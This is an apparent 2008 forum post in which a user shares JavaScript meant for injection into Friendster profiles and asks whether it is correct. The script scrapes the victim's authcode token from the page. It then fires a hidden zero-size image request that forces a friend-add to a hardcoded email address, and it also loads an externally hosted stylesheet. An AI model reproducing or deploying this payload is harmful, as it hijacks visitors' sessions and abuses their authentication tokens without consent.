so according to my opinion here's the example codes that hve to be host :
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","http://forsakendoll3.fileave.com/SchoolMadness.css
");
document.getElementsByTagName("head")[0].appendChild(css);
var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);
function afa() {
var eadd = "mc_heal@hotmail.com";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};
is this the correct codes???
then after i host it, i must generate it JS generator isn't? and paste to who you want to meet isn't?
but strangely, it didn't work T_T
Last edited by gepukz (2008-10-01 10:48:47)